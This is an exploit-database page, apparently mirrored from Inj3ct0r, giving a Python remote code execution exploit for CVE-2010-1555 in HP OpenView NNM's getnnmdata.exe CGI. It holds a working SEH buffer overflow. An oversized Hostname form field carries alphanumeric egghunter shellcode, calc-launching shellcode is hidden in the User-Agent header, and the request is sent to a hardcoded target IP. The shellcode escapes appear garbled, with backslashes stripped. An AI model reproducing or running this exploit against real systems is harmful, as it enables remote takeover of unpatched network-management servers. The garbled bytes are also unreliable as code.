HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Code Exe

Posted on 02 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Code Execution</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================================
HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Code Execution
==================================================================


# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows 2003
# CVE: CVE-2010-1555
 
# Code :
 
#!/usr/bin/python
 
import struct
import socket
import httplib
import urllib
 
eh =(
&quot;x50x59x49x49x49x49x49x49x49x49x49x49x51x5a&quot;
&quot;x56x54x58x33x30x56x58x34x41x50x30x41x33x48&quot;
&quot;x48x30x41x30x30x41x42x41x41x42x54x41x41x51&quot;
&quot;x32x41x42x32x42x42x30x42x42x58x50x38x41x43&quot;
&quot;x4ax4ax49x42x46x4dx51x49x5ax4bx4fx44x4fx50&quot;
&quot;x42x46x32x42x4ax43x32x50x58x48x4dx46x4ex47&quot;
&quot;x4cx43x35x50x5ax43x44x4ax4fx4fx48x50x54x46&quot;
&quot;x50x50x30x50x57x4cx4bx4bx4ax4ex4fx42x55x4b&quot;
&quot;x5ax4ex4fx44x35x4bx57x4bx4fx4dx37x41x41&quot;
)
# calc.exe Windows Execute Command
sc2 = (
&quot;x89xe7xdbxc4xd9x77xf4x5ax4ax4ax4ax4ax4ax4ax4a&quot;
&quot;x4ax4ax4ax4ax43x43x43x43x43x43x37x52x59x6ax41&quot;
&quot;x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42&quot;
&quot;x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b&quot;
&quot;x4cx4ax48x4cx49x47x70x43x30x45x50x51x70x4fx79&quot;
&quot;x4dx35x50x31x4bx62x43x54x4ex6bx51x42x46x50x4e&quot;
&quot;x6bx50x52x46x6cx4ex6bx51x42x46x74x4cx4bx43x42&quot;
&quot;x47x58x46x6fx4fx47x42x6ax46x46x44x71x4bx4fx44&quot;
&quot;x71x4fx30x4ex4cx47x4cx51x71x51x6cx46x62x44x6c&quot;
&quot;x45x70x4fx31x48x4fx44x4dx47x71x4ax67x4ax42x4c&quot;
&quot;x30x43x62x46x37x4cx4bx50x52x44x50x4cx4bx42x62&quot;
&quot;x45x6cx45x51x4ex30x4cx4bx47x30x50x78x4ex65x4b&quot;
&quot;x70x43x44x43x7ax43x31x4ax70x46x30x4ex6bx51x58&quot;
&quot;x42x38x4cx4bx46x38x47x50x43x31x4bx63x4bx53x47&quot;
&quot;x4cx42x69x4cx4bx45x64x4cx4bx45x51x4ax76x46x51&quot;
&quot;x4bx4fx45x61x49x50x4cx6cx4ax61x48x4fx44x4dx45&quot;
&quot;x51x4ax67x47x48x4bx50x44x35x4bx44x44x43x43x4d&quot;
&quot;x4ax58x47x4bx43x4dx51x34x51x65x4dx32x42x78x4c&quot;
&quot;x4bx43x68x47x54x47x71x4ax73x51x76x4cx4bx46x6c&quot;
&quot;x50x4bx4ex6bx42x78x45x4cx45x51x49x43x4cx4bx47&quot;
&quot;x74x4ex6bx47x71x4ex30x4dx59x47x34x46x44x44x64&quot;
&quot;x51x4bx43x6bx50x61x42x79x42x7ax50x51x49x6fx49&quot;
&quot;x70x43x68x51x4fx51x4ax4ex6bx45x42x4ax4bx4dx56&quot;
&quot;x43x6dx50x6ax47x71x4cx4dx4cx45x4ex59x45x50x45&quot;
&quot;x50x45x50x50x50x43x58x45x61x4ex6bx42x4fx4bx37&quot;
&quot;x4bx4fx4ax75x4dx6bx4cx30x4cx75x49x32x42x76x50&quot;
&quot;x68x4dx76x4ax35x4fx4dx4fx6dx4bx4fx49x45x47x4c&quot;
&quot;x43x36x51x6cx45x5ax4bx30x49x6bx4bx50x43x45x45&quot;
&quot;x55x4dx6bx42x67x47x63x51x62x42x4fx50x6ax45x50&quot;
&quot;x51x43x4bx4fx4bx65x45x33x43x51x50x6cx45x33x46&quot;
&quot;x4ex43x55x51x68x50x65x43x30x45x5ax41x41&quot;
)
 
ret = struct.pack('&lt;L',0x5A667A77) # ppr
shortjmp = 'x74x30x41x41' # JZ
align = &quot;x58&quot;*3
asdf = (
&quot;x2d&quot;
&quot;x30x65x67x66&quot;
&quot;x2d&quot;
&quot;x30x67x65x66&quot;
&quot;x2d&quot;
&quot;x30x33x33x33&quot;
)
 
p = urllib.urlencode({'SnmpLastVal':'A','Topo':'B','Hostname':'A'*2038 + shortjmp + ret + &quot;C&quot;*50+align+asdf+&quot;C&quot;*36+eh+&quot;D&quot;*18000})
 
h = {&quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;,&quot;Host&quot;:&quot;172.16.29.149&quot;,&quot;User-Agent&quot;:&quot;T00WT00W&quot;+sc2}
 
c = httplib.HTTPConnection('172.16.29.149')
c.request(&quot;POST&quot;,&quot;/OvCgi/getnnmdata.exe&quot;,p,h)
r = c.getresponse()
 
print r.status, r.reason
data = r.read()
print data
c.close()
 
print &quot;
Done
&quot;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-02]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20